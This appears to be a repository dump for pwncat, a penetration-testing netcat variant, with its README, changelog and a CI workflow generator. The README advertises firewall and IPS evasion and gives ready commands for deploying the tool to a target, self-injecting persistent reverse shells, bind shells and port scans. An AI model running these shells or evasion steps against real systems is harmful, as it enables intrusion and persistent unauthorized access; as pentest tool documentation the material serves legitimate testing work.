README.md
**[Docs](#closed_book-documentation)** |
**[Install](#tada-install)** |
**[TL;DR](#coffee-tldr)** |
**[Features](#star-features)** |
**[Behaviour](#cop-behaviour)** |
**[Usage](#computer-usage)** |
**[Examples](#bulb-examples)** |
**[FAQ](#information_source-faq)** |
**[Contributing](#octocat-contributing)** |
**[Disclaimer](#exclamation-disclaimer)** |
**[License](#page_facing_up-license)**

---

<center><img alt="pwncat banner" title="pwncat" src="art/banner-1.png" style=""/></center>

# pwncat

[![](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)
[![Documentation Status](https://readthedocs.org/projects/pwn-cat/badge/?version=latest)](https://docs.pwncat.org/en/latest/?badge=latest)
[![PyPI](https://img.shields.io/pypi/v/pwncat)](https://pypi.org/project/pwncat/)
[![PyPI - Status](https://img.shields.io/pypi/status/pwncat)](https://pypi.org/project/pwncat/)
[![PyPI - Python Version](https://img.shields.io/pypi/pyversions/pwncat)](https://pypi.org/project/pwncat/)
[![PyPI - Format](https://img.shields.io/pypi/format/pwncat)](https://pypi.org/project/pwncat/)
[![PyPI - Implementation](https://img.shields.io/pypi/implementation/pwncat)](https://pypi.org/project/pwncat/)
[![PyPI - License](https://img.shields.io/pypi/l/pwncat)](https://pypi.org/project/pwncat/)

[![Build Status](https://github.com/cytopia/pwncat/workflows/linting/badge.svg)](https://github.com/cytopia/pwncat/actions?workflow=linting)
[![Build Status](https://github.com/cytopia/pwncat/workflows/building/badge.svg)](https://github.com/cytopia/pwncat/actions?workflow=building)


> &nbsp;
> #### Netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python ([PSE](pse/)). - [docs.pwncat.org](https://docs.pwncat.org)
> &nbsp;


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse:collapse; border:none;">
 <thead>
  <tr valign="top" border="0" cellpadding="0" cellspacing="0" style="border:none;">
   <th border="0" cellpadding="0" cellspacing="0" style="border:none;">Code Style</td>
   <th border="0" cellpadding="0" cellspacing="0" style="border:none;"></td>
   <th border="0" cellpadding="0" cellspacing="0" style="border:none;">Integration Tests <sup><small>[2]</small></sup></td>
  </tr>
 </thead>
 <tbody>
  <tr valign="top" border="0" cellpadding="0" cellspacing="0" style="border:none;">
   <td border="0" cellpadding="0" cellspacing="0" style="border:none;">
    <table>
     <thead>
      <tr>
       <th>Styler</th>
       <th>Status</th>
      </tr>
     </thead>
     <tbody>
      <tr>
       <td><a href="https://github.com/psf/black">Black</a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=black"><img src="https://github.com/cytopia/pwncat/workflows/black/badge.svg" /></a></td>
      </tr>
      <tr>
       <td><a href="https://github.com/python/mypy">mypy</a> <sup><small>[1]</small></sup></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=mypy"><img src="https://github.com/cytopia/pwncat/workflows/mypy/badge.svg" /></a></td>
      </tr>
      <tr>
       <td><a href="https://github.com/PyCQA/pycodestyle">pycodestyle</a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=pycode"><img src="https://github.com/cytopia/pwncat/workflows/pycode/badge.svg" /></a></td>
      </tr>
      <tr>
       <td><a href="https://github.com/PyCQA/pydocstyle">pydocstyle</a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=pydoc"><img src="https://github.com/cytopia/pwncat/workflows/pydoc/badge.svg" /></a></td>
      </tr>
      <tr>
       <td><a href="https://github.com/PyCQA/pylint">pylint</a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=pylint"><img src="https://github.com/cytopia/pwncat/workflows/pylint/badge.svg" /></a></td>
      </tr>
     </tbody>
    </table>
   </td>
   <td border="0" cellpadding="0" cellspacing="0" style="border:none;"></td>
   <td border="0" cellpadding="0" cellspacing="0" style="border:none;">
    <table>
     <thead>
      <tr>
       <th><sub>Python</sub><sup>OS</sup></th>
       <th>Linux</th>
       <th>MacOS</th>
       <th>Windows</th>
      </tr>
     </thead>
     <tbody>
      <tr>
       <th>2.7</th>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=ubu-2.7"><img src="https://github.com/cytopia/pwncat/workflows/ubu-2.7/badge.svg" /></a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=mac-2.7"><img src="https://github.com/cytopia/pwncat/workflows/mac-2.7/badge.svg" /></a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=win-2.7"><img src="https://github.com/cytopia/pwncat/workflows/win-2.7/badge.svg" /></a></td>
      </tr>
      <tr>
       <th>3.5</th>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=ubu-3.5"><img src="https://github.com/cytopia/pwncat/workflows/ubu-3.5/badge.svg" /></a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=mac-3.5"><img src="https://github.com/cytopia/pwncat/workflows/mac-3.5/badge.svg" /></a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=win-3.5"><img src="https://github.com/cytopia/pwncat/workflows/win-3.5/badge.svg" /></a></td>
      </tr>
      <tr>
       <th>3.6</th>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=ubu-3.6"><img src="https://github.com/cytopia/pwncat/workflows/ubu-3.6/badge.svg" /></a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=mac-3.6"><img src="https://github.com/cytopia/pwncat/workflows/mac-3.6/badge.svg" /></a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=win-3.6"><img src="https://github.com/cytopia/pwncat/workflows/win-3.6/badge.svg" /></a></td>
      </tr>
      <tr>
       <th>3.7</th>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=ubu-3.7"><img src="https://github.com/cytopia/pwncat/workflows/ubu-3.7/badge.svg" /></a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=mac-3.7"><img src="https://github.com/cytopia/pwncat/workflows/mac-3.7/badge.svg" /></a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=win-3.7"><img src="https://github.com/cytopia/pwncat/workflows/win-3.7/badge.svg" /></a></td>
      </tr>
      <tr>
       <th>3.8</th>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=ubu-3.8"><img src="https://github.com/cytopia/pwncat/workflows/ubu-3.8/badge.svg" /></a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=mac-3.8"><img src="https://github.com/cytopia/pwncat/workflows/mac-3.8/badge.svg" /></a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=win-3.8"><img src="https://github.com/cytopia/pwncat/workflows/win-3.8/badge.svg" /></a></td>
      </tr>
      <tr>
       <th>pypy2</th>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=ubu-py2"><img src="https://github.com/cytopia/pwncat/workflows/ubu-py2/badge.svg" /></a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=mac-py2"><img src="https://github.com/cytopia/pwncat/workflows/mac-py2/badge.svg" /></a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=win-py2"><img src="https://github.com/cytopia/pwncat/workflows/win-py2/badge.svg" /></a></td>
      </tr>
      <tr>
       <th>pypy3</th>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=ubu-py3"><img src="https://github.com/cytopia/pwncat/workflows/ubu-py3/badge.svg" /></a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=mac-py3"><img src="https://github.com/cytopia/pwncat/workflows/mac-py3/badge.svg" /></a></td>
       <td><a href="https://github.com/cytopia/pwncat/actions?workflow=win-py3"><img src="https://github.com/cytopia/pwncat/workflows/win-py3/badge.svg" /></a></td>
      </tr>
     </tbody>
    </table>
   </td>
  </tr>
 </tbody>
</table>

> <sup>[1] <a href="https://cytopia.github.io/pwncat/pwncat.type.html">mypy type coverage</a> <strong>(fully typed: 94.00%)</strong></sup><br/>
> <sup>[2] <strong>Failing builds do not indicate broken functionality.</strong> Integration tests run for multiple hours and break sporadically for various different reasons (network timeouts, unknown cancellations of GitHub Actions, etc): <a href="https://github.com/actions/virtual-environments/issues/736">#735</a>, <a href="https://github.com/actions/virtual-environments/issues/841">#841</a></sup><br/>
> <sup></sup>


#### Motivation
Ever accidentally hit <kbd>Ctrl</kbd>+<kbd>c</kbd> on your reverse shell and it was gone for good?
Ever waited forever for your client to connect back to you, because the Firewall didn't let it out?
Ever had a connection loss because an IPS closed suspicious ports?
Ever were in need of a quick port forwarding?<br/>
> **This one got you covered.**

Apart from that the current features of `nc`, `ncat` or `socat` just didn't feed my needs and I also wanted to have a single
tool that works on older and newer machines (hence Python 2+3 compat). Most importantly I wanted to have it in a language that I can understand and provide my own features with.
(Wait for it, binary releases for Linux, MacOS and Windows will come shortly).


## :closed_book: Documentation

| Pwncat docs     | Link |
|:----------------|:-----|
| Official documentation | [https://docs.pwncat.org](https://docs.pwncat.org) |
| Official website | [https://pwncat.org](https://pwncat.org) |
| API documentation | [https://pwncat.org/pwncat.api.html](https://pwncat.org/pwncat.api.html) |
| Pwncat Scripting Engine | [PSE](https://github.com/cytopia/pwncat/tree/master/pse) |


## :tada: Install

Current version is: **0.1.2**

#### Generic

| [Pip](https://pypi.org/project/pwncat/) |
|:-:|
| [![](https://raw.githubusercontent.com/cytopia/icons/master/64x64/python.png)](https://pypi.org/project/pwncat/) |
| `pip install pwncat` |


#### OS specific

| **[MacOS][mac_lnk]**         | **[Arch Linux][arch_lnk]**   | **[BlackArch][barch_lnk]**         | **[CentOS][centos_lnk]**<sup>[1]</sup>       |
|:----------------------------:|:----------------------------:|:----------------------------------:|:--------------------------------------------:|
| [![mac_img]][mac_lnk]        | [![arch_img]][arch_lnk]      | [![barch_img]][barch_lnk]          | [![centos_img]][centos_lnk]                  |
| `brew install pwncat`        | `yay -S pwncat`              | `pacman -S pwncat`                 | `yum install pwncat`                         |
| **[Fedora][fedora_lnk]**     | **[Kali Linux][kali_lnk]**   | **[NixOS][nix_lnk]<sup>[2]</sup>** | **[Oracle Linux][oracle_lnk]<sup>[1]</sup>** |
| [![fedora_img]][fedora_lnk]  | [![kali_img]][kali_lnk]      | [![nix_img]][nix_lnk]              | [![oracle_img]][oracle_lnk]                  |
|  `dnf install pwncat`        | `apt install pwncat`         | `nixos.pwncat`                     | `yum install pwncat`                         |
| **[Pentoo][pentoo_lnk]**     |  **[Parrot OS][parrot_lnk]** |
| [![pentoo_img]][pentoo_lnk]  | [![parrot_img]][parrot_lnk]  |
|  `net-analyzer/pwncat`       | `apt install pwncat`         |

> <sup>[1]: Epel repository</sup><br/>
> <sup>[2]: Unstable</sup>

[mac_lnk]: https://formulae.brew.sh/formula/pwncat#default
[mac_img]: https://raw.githubusercontent.com/cytopia/icons/master/64x64/osx.png

[arch_lnk]: https://aur.archlinux.org/packages/pwncat/
[arch_img]: https://raw.githubusercontent.com/cytopia/icons/master/64x64/archlinux.png

[barch_lnk]: https://www.blackarch.org/tools.html
[barch_img]: https://raw.githubusercontent.com/cytopia/icons/master/64x64/blackarch.png

[centos_lnk]: https://pkgs.org/download/pwncat
[centos_img]: https://raw.githubusercontent.com/cytopia/icons/master/64x64/centos.png

[fedora_lnk]: https://src.fedoraproject.org/rpms/pwncat
[fedora_img]: https://raw.githubusercontent.com/cytopia/icons/master/64x64/fedora.png

[kali_lnk]: https://gitlab.com/kalilinux/packages/pwncat
[kali_img]: https://raw.githubusercontent.com/cytopia/icons/master/64x64/kali.png

[nix_lnk]: https://search.nixos.org/packages?channel=unstable&query=pwncat
[nix_img]: https://raw.githubusercontent.com/cytopia/icons/master/64x64/nixos.png

[oracle_lnk]: https://yum.oracle.com/repo/OracleLinux/OL8/developer/EPEL/x86_64/index.html
[oracle_img]: https://raw.githubusercontent.com/cytopia/icons/master/64x64/oracle-linux.png

[parrot_lnk]: https://repology.org/project/pwncat/versions
[parrot_img]: https://raw.githubusercontent.com/cytopia/icons/master/64x64/parrot.png

[pentoo_lnk]: https://repology.org/project/pwncat/versions
[pentoo_img]: https://raw.githubusercontent.com/cytopia/icons/master/64x64/pentoo.png



## :coffee: TL;DR

This is just a quick get-you-started overview. For more advanced techniques see **[:computer: Usage](#computer-usage)** or **[:bulb: Examples](#bulb-examples)**.

### See in action

<table>
 <tr>
  <td widht="50%" style="text-align:center;">
   <a href="https://www.youtube.com/watch?v=lN10hgl_Ts8&list=PLT1I2bH6BKxj2qEylDdEns39ej8g3_eMc&index=2&t=0s">unbreakable reverse shells - how to spawn</a><br/><br/>
   <a href="https://www.youtube.com/watch?v=lN10hgl_Ts8&list=PLT1I2bH6BKxj2qEylDdEns39ej8g3_eMc&index=2&t=0s"><img src="docs/img/video01.png" /></a>
  </td>
  <td widht="50%" style="text-align:center;">
   <a href="https://www.youtube.com/watch?v=VQyFoUG18WY&list=PLT1I2bH6BKxj2qEylDdEns39ej8g3_eMc&index=2">unbreakable reverse shells - multiple shells</a><br/><br/>
   <a href="https://www.youtube.com/watch?v=VQyFoUG18WY&list=PLT1I2bH6BKxj2qEylDdEns39ej8g3_eMc&index=2"><img src="docs/img/video02.png" /></a>
  </td>
 </tr>
</table>


### Deploy to target
```bash
# Copy base64 data to clipboard from where you have internet access
curl https://raw.githubusercontent.com/cytopia/pwncat/master/bin/pwncat | base64

# Paste it on the target machine
echo "<BASE64 STRING>" | base64 -d > pwncat
chmod +x pwncat
```

### Inject to target
```bash
# [1] If you found a vulnerability on the target to start a very simple reverse shell,
# such as via bash, php, perl, python, nc or similar, you can instruct your local
# pwncat listener to use this connection to deploy itself on the target automatically
# and start an additional unbreakable reverse shell back to you.
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445
```
> <sup>[1] [Read in more detail about self-injection](#self-injecting-reverse-shell)

### Summon shells
```bash
# Bind shell (accepts new clients after disconnect)
pwncat -l -e '/bin/bash' 8080 -k
```
```bash
# Reverse shell (Ctrl+c proof: reconnects back to you)
pwncat -e '/bin/bash' example.com 4444 --reconn --recon-wait 1
```
```bash
# Reverse UDP shell (Ctrl+c proof: reconnects back to you)
pwncat -e '/bin/bash' example.com 4444 -u --ping-intvl 1
```

### Port scan
```bash
# [TCP] IPv4 + IPv6
pwncat -z 10.0.0.1 80,443,8080
pwncat -z 10.0.0.1 1-65535
pwncat -z 10.0.0.1 1+1023

# [UDP] IPv4 + IPv6
pwncat -z 10.0.0.1 80,443,8080 -u
pwncat -z 10.0.0.1 1-65535 -u
pwncat -z 10.0.0.1 1+1023 -u

# Use only IPv6 or IPv4
pwncat -z 10.0.0.1 1-65535 -4
pwncat -z 10.0.0.1 1-65535 -6 -u

# Add version detection
pwncat -z 10.0.0.1 1-65535 --banner
```

### Local port forward `-L` (listening proxy)
```bash
# Make remote MySQL server (remote port 3306) available on current machine
# on every interface on port 5000
pwncat -L 0.0.0.0:5000 everythingcli.org 3306
```
```bash
# Same, but convert traffic on your end to UDP
pwncat -L 0.0.0.0:5000 everythingcli.org 3306 -u
```

### Remote port forward `-R` (double client proxy)
```bash
# Connect to Remote MySQL server (remote port 3306) and then connect to another
# pwncat/netcat server on 10.0.0.1:4444 and bridge traffic
pwncat -R 10.0.0.1:4444 everythingcli.org 3306
```
```bash
# Same, but convert traffic on your end to UDP
pwncat -R 10.0.0.1:4444 everythingcli.org 3306 -u
```

> <sub>[SSH Tunnelling for fun and profit :link:](https://www.everythingcli.org/ssh-tunnelling-for-fun-and-profit-local-vs-remote/)</sub><br/>
> <sub>[`pwncat` example: Port forwarding magic](#port-forwarding-magic)<sub>


## :star: Features

### At a glance

`pwncat` has many features, below is only a list of outstanding characteristics.

| Feature        | Description |
|----------------|-------------|
| [PSE](pse)        | Fully scriptable with Pwncat Scripting Engine to allow all kinds of fancy stuff on send and receive |
| port scanning  | TCP und UDP port scanning with basic version detection support |
| Self-injecting rshell | Self-injecting mode to deploy itself and start an unbreakable reverse shell back to you automatically |
| Bind shell        | Create bind shells |
| Reverse shell     | Create reverse shells |
| Port Forward      | Local and remote port forward (Proxy server/client) |
| <kbd>Ctrl</kbd>+<kbd>c</kbd> | Reverse shell can reconnect if you accidentally hit <kbd>Ctrl</kbd>+<kbd>c</kbd> |
| Detect Egress     | Scan and report open egress ports on the target (port hopping) |
| Evade FW          | Evade egress firewalls by round-robin outgoing ports (port hopping) |
| Evade IPS         | Evade Intrusion Prevention Systems by being able to round-robin outgoing ports on connection interrupts (port hopping) |
| UDP rev shell     | Try this with the traditional `netcat` |
| Stateful UDP      | Stateful connect phase for UDP client mode |
| TCP / UDP         | Full TCP and UDP support |
| IPv4 / IPv6       | Dual or single stack IPv4 and IPv6 support |
| Python 2+3        | Works with Python 2, Python 3, pypy2 and pypy3 |
| Cross OS          | Work on Linux, MacOS and Windows as long as Python is available |
| Compatability     | Use the `netcat`, `ncat` or `socat` as a client or server together with `pwncat` |
| Portable          | Single file which only uses core packages - no external dependencies required. |


### Feature comparison matrix

|                     | pwncat   | netcat | ncat  | socat |
|---------------------|----------|--------|-------|-------|
| Scripting engine    | ✔ Python | :x:    | ✔ Lua | :x:   |
|                     |          |        |       |       |
| IP ToS              | ✔        | ✔      | :x:   | ✔     |
| IPv4                | ✔        | ✔      | ✔     | ✔     |
| IPv6                | ✔        | ✔      | ✔     | ✔     |
| Unix domain sockets | :x:      | ✔      | ✔     | ✔     |
| Linux vsock         | :x:      | :x:    | ✔     | :x:   |
| Socket source bind  | ✔        | ✔      | ✔     | ✔     |
|                     |          |        |       |       |
| TCP                 | ✔        | ✔      | ✔     | ✔     |
| UDP                 | ✔        | ✔      | ✔     | ✔     |
| SCTP                | :x:      | :x:    | ✔     | ✔     |
| SSL                 | :x:      | :x:    | ✔     | ✔     |
| HTTP                | ✔        | :x:    | :x:   | :x:   |
| HTTPS               | *        | :x:    | :x:   | :x:   |
|                     |          |        |       |       |
| Telnet negotiation  | :x:      | ✔      | ✔     | :x:   |
| Proxy support       | :x:      | ✔      | ✔     | ✔     |
| Local port forward  | ✔        | :x:    | :x:   | ✔     |
| Remote port forward | ✔        | :x:    | :x:   | :x:   |
|                     |          |        |       |       |
| Inbound port scan   | ✔        | ✔      | ✔     | :x:   |
| Outbound port scan  | ✔        | :x:    | :x:   | :x:   |
| Version detection   | ✔        | :x:    | :x:   | :x:   |
|                     |          |        |       |       |
| Chat                | ✔        | ✔      | ✔     | ✔     |
| Command execution   | ✔        | ✔      | ✔     | ✔     |
| Hex dump            | *        | ✔      | ✔     | ✔     |
| Broker              | :x:      | :x:    | ✔     | :x:   |
| Simultaneous conns  | :x:      | :x:    | ✔     | ✔     |
| Allow/deny          | :x:      | :x:    | ✔     | ✔     |
| Re-accept           | ✔        | ✔      | ✔     | ✔     |
| Self-injecting      | ✔        | :x:    | :x:   | :x:   |
| UDP reverse shell   | ✔        | :x:    | :x:   | :x:   |
| Respawning client   | ✔        | :x:    | :x:   | :x:   |
| Port hopping        | ✔        | :x:    | :x:   | :x:   |
| Emergency shutdown  | ✔        | :x:    | :x:   | :x:   |

> <sup>`*` Feature is currently under development.


## :cop: Behaviour

Like the original implementation of `netcat`, when using **TCP**, `pwncat`
(in client and listen mode) will automatically quit, if the network connection has been terminated,
properly or improperly.
In case the remote peer does not terminate the connection, or in **UDP** mode, `netcat` and `pwncat` will stay open. The behaviour differs a bit when STDIN is closed.

1. `netcat`: If STDIN is closed, but connection stays open, `netcat` will stay open
2. `pwncat`: If STDIN is closed, but connection stays open, `pwncat` will close

You can emulate the `netcat` behaviour with `--no-shutdown` command line argument.

Have a look at the following commands to better understand this behaviour:

```bash
# [Valid HTTP request] Quits, web server keeps connection intact, but STDIN is EOF
printf "GET / HTTP/1.1\n\n" | pwncat www.google.com 80

# [Valid HTTP request] Does not quit, web server keeps connection intact, but STDIN is EOF
printf "GET / HTTP/1.1\n\n" | pwncat www.google.com 80 --no-shutdown
```

```bash
# [Invalid HTTP request] Quits, because the web server closes the connection and STDIN is EOF
printf "GET / \n\n" | pwncat www.google.com 80
```

```bash
# [TCP]
# Both instances will quit after successful file transfer.
pwncat -l 4444 > output.txt
pwncat localhost 4444 < input.txt

# [TCP]
# Neither of both, client and server will quit after successful transfer
# and they will be stuck, waiting for more input or output.
# When exiting one (e.g.: via Ctrl+c), the other one will quit as well.
pwncat -l 4444 --no-shutdown > output.txt
pwncat localhost 4444 --no-shutdown < input.txt
```

Be advised that it is not reliable to send files via UDP
```bash
# [UDP] (--no-shutdown has no effect, as this is the default behaviour in UDP)
# Neither of both, client and server will quit after successful transfer
# and they will be stuck, waiting for more input or output.
# When exiting one (e.g.: via Ctrl+c), the other one will still stay open in UDP mode.
pwncat -u -l 4444 > output.txt
pwncat -u localhost 4444 < input.txt
```

There are many ways to alter this default behaviour. Have a look at the [usage](#computer-usage)
section for more advanced settings.


## :computer: Usage

### Keys

| Behaviour      | ![Alt][Linux] | ![Alt][MacOS] | ![Alt][Windows] |
|----------------|---------------|---------------|-----------------|
| Quit (SIGINT)  | <kbd>Ctrl</kbd>+<kbd>c</kbd>  | <kbd>Ctrl</kbd>+<kbd>c</kbd> | <kbd>Ctrl</kbd>+<kbd>c</kbd> |
| Quit (SIGQUIT) | <kbd>Ctrl</kbd>+<kbd>\\</kbd> | ? | ? |
| Quit (SIGQUIT) | <kbd>Ctrl</kbd>+<kbd>4</kbd>  | ? | ? |
| Quit STDIN<sup>[1]</sup> | <kbd>Ctrl</kbd>+<kbd>d</kbd>  | <kbd>Ctrl</kbd>+<kbd>d</kbd> | <kbd>Ctrl</kbd>+<kbd>z</kbd> and <kbd>Ctrl</kbd>+<kbd>Enter</kbd> |
| Send (NL)      | <kbd>Ctrl</kbd>+<kbd>j</kbd>  | ? | ? |
| Send (EOL)     | <kbd>Ctrl</kbd>+<kbd>m</kbd>  | ? | ? |
| Send (EOL)     | <kbd>Enter</kbd>              | <kbd>Enter</kbd> | <kbd>Enter</kbd> |


CHANGELOG.md
# Changelog


## Unreleased


## Release 0.1.2

### Fixes
- Fixes: [#109](https://github.com/cytopia/pwncat/issues/109) when pasting in term I donot get full line echo


## Release 0.1.1

### Fixes
- Fixes: pwncat will re-accept during local portforwarding if the client quits (previously pwncat shutdown)


## Release 0.1.0

### Fixes
- Fixed UTF-8 char conversion for Python3
- Fixed calculation for socket bytes sent
- Fixed shutdown handling for port scanner
- Fixed false positives for port scanner
- Fixed sending binary data from stdin
- Fixed self-inject mode if remote sends greetings or prefixes: #83
- Fixed remote command to respawn if it crashes due to bad user input

### Added
- Implemented signal handler to distribute shutdown signals across threads
- Feature: `--no-shutdown` to copy the behaviour of OpenBSD netcat to keep stdin open after EOF
- Feature: `--http`
- Feature: `send-on-eof`
- CI: Integration tests for inject shell
- CI: Integration tests for different file transfer modes
- Added artwork

### Changed
- Changed behaviour to close after EOF on stdin (can be reverted via `--no-shutdown`)
- Added faster method to validate remote files in CNC mode


## Release 0.0.23-alpha

### Fixed
- Fixed freeze in raw mode: #81

### Added
- Install instructions for ArchLinux


## Release 0.0.22-alpha

### Added
- Feature: Rebind forever: `--rebind`: #44
- Feature: Wait between rebind attempts: `--rebind-wait`: #45
- Feature: Port hopping for rebinds: `--rebind-robin`: #46
- Feature: Send initial ping `--ping-init`: #48
- Feature: Zero-I/O mode (port scan) `--zero`: #32
- Feature: Safeword: `--safe-word`: #51
- Feature: Stateless UDP connect: `--udp-sconnect` and `--udp-sconnect-word`: #79

### Changes
- Re-organized command line arguments for better overview


## Release 0.0.21-alpha

### Added
- Feature: Be able to inject multiple reverse shells `--self-inject` by specifying a port list (comma separated, range or increment): https://www.youtube.com/watch?v=VQyFoUG18WY

### Changed
- port argument not only takes comma seperated value or range, but now also an increment: `443+10`


## Release 0.0.20-alpha

### Added
- Feature: Be able to specify source address and port for clients: #66


## Release 0.0.19-alpha

### Added
- Feature: Dualstack IPv4 and IPv6 by default (use `-4` or `-6` to use either of them alone)
- Feature: Allow `addr` part in `--local` to be optional for consistency: #54
- Feature: Have a stateful connect phase for UDP
- CI: Run integration tests for any combination of IPv4, IPv6, TCP, UDP, specific bind and wildcard bind

### Fixes
- Ensure remote hostname is mandatory for `--local`/`-L` mode


## Release 0.0.18-alpha

### Added
- Feature: IP ToS selection (`-T`/`--tos`)
- Feature: Print socket options (`--info`) for socket, IPv4, IPv6 and/or TCP


## Release 0.0.17-alpha

### Fixed
- CI: Fixed test frameworks for error checking

### Added
- Feature: IPv6 support (`-6`)

#### Changed
- Changed `--rebind` to allow omitting an argument for endless connect retries


## Release 0.0.16-alpha

### Added
- Added self-injecting unbreakable pwncat reverse shell


## Release 0.0.15-alpha

#### Fixed
- Fixed broken pipe with `tail -F`

#### Changed
- CI: Retry with different port on test failure


## Release 0.0.14-alpha

#### Added
- Added feature: Made `PSEStore` instance available to all PSE scripts to persist data, interacti with sockets, stop signal and logger
- Added chat-bot PSE
- Added documentation for PSE API


## Release 0.0.13-alpha

#### Added
- Feature: Client port hopping (`--reconn-robin`): #43


## Release 0.0.12-alpha

#### Added
- Feature: Adedd PSE: Pwncat Scripting Engine (`--script-send` and `--script-recv`): #62


## Release 0.0.11-alpha

#### Fixed
- Fixed various bugs with `--reconn`, `--keep-open`, `--local` and `--remote`
- Fixed various bugs with threads
- Fixed shutdown behaviour with Ctrl+c for --keep-open
- Fixed shutdown behaviour with Ctrl+c for --reconn

#### Added
- Feature: Custom ping word (`--ping-word`): #49
- Python type coverage report
- CI: Added ca. 13,000 LoC integration tests and fixed findings accordingly
- CI: Added dockerized interactive tests to simulate Ctrl+c

#### Changed
- Code: really heavy heavy code refactoring
- Option: `-C`/`--crlf` now takes an argument to either force LF, CRLF or CR or even remove line feeds altogether on input AND output (or keep as it is, if not specified)
- Modularized code for better plugin integration
- Fixes #47 Change `--udp-*` options to `--*` to allow both, UDP and TCP


## Release 0.0.10-alpha

#### Added
- CI: pylinyt
- CI: mypy

#### Changed
- Code: heavy refactoring
- CI: separate jobs
- API: switched from pdoc to pdoc3


## Release 0.0.9-alpha

#### Added
- Feature: colorized logging (`-c`/`--color`): #56


## Release 0.0.8-alpha

#### Added
- Feature: implemented remote port forwarding mode: `-R`/`--remote`


## Release 0.0.7-alpha

#### Fixed
- Fixed `-L`/`--local` mode to now persist multiple requests
- Fixed `-C`/`--crlf` Only replace `\n` with `\r\n` if `\n` exists and don't blindly add.

#### Added
- Integration tests for `L`/`--local` mode

#### Changed
- Plugin architecture has been heavily refactored to make it easier to add new plugins
- Improved logging


## Release 0.0.6-alpha

#### Fixed
- Fixed `-n`/`--nodns` to actually not resolve DNS
- Fixed various threading issues

#### Added
- Check for unimplemented options
- Feature: Made socket receive non-blocking
- Feature: Made stdin non-blocking (except for Windows)
- Documentation: man page
- Documentation: updated readme and contribution guidelines
- CI: lots of integration tests for Linux, MacOS and Windows

#### Changed
- Changed daemon threads to non-daemon threads
- Use Python's `logging` module instead of self-written one
- Usage options have changed drastically
- Changed `--reconn` and `--reconn-wait` to keep open (`-k`/`--keep`)

#### Removed
- Removed `builtins` import for cross-os base install compatibility



.github/workflows/gen.sh
#!/usr/bin/env bash

set -e
set -u
set -o pipefail

SCRIPT_PATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )"

TPL_NAME="template-test.tpl"
TPL_PATH="${SCRIPT_PATH}/${TPL_NAME}"
FLW_PATH="${SCRIPT_PATH}"


###
### Build Matrix
###
PYTHON_VERSIONS=("2.7" "3.5" "3.6" "3.7" "3.8" "pypy2" "pypy3")
OPERATING_SYSTEMS=("ubuntu" "windows" "macos")
PYTHON_ARCHS=("x64" "x86")


find "${FLW_PATH}" -name "test-*" -exec rm {} \;

for arch in ${!PYTHON_ARCHS[*]}; do
	for os in ${!OPERATING_SYSTEMS[*]}; do
		for v in ${!PYTHON_VERSIONS[*]}; do
			arch_name="${PYTHON_ARCHS[${arch}]}"

			out_file="${FLW_PATH}/test-${arch_name}-${OPERATING_SYSTEMS[${os}]//ubuntu/linux}-${PYTHON_VERSIONS[${v}]}.yml"
			flw_name="${OPERATING_SYSTEMS[${os}]:0:3}-${arch_name}-${PYTHON_VERSIONS[${v}]}"
			job_name="[${OPERATING_SYSTEMS[${os}]:0:3}] [${arch_name}] ${PYTHON_VERSIONS[${v}]}"
			os_name="${OPERATING_SYSTEMS[${os}]}-latest"
			python="${PYTHON_VERSIONS[${v}]}"

			flw_name="${flw_name//ubu/lin}"
			job_name="${job_name//ubu/lin}"

			printf "%s\\n" "-----------------------------------------------------------"
			printf "file:      %s\\n" "${out_file}"
			printf "flw name:  %s\\n" "${flw_name}"
			printf "job name:  %s\\n" "${job_name}"
			printf "OS:        %s\\n" "${os_name}"
			printf "Arch:      %s\\n" "${arch_name}"
			printf "Python:    %s\\n" "${python}"

			cat "${TPL_PATH}" \
				| sed "s/__WORKFLOW_NAME__/${flw_name}/g" \
				| sed "s/__OS__/${os_name}/g" \
				| sed "s/__PYTHON_VERSION__/${python}/g" \
				| sed "s/__JOB_NAME__/${job_name}/g" \
				| sed "s/__ARCHITECTURE__/${arch_name}/g" \
				> "${out_file}"
		done
	done
done
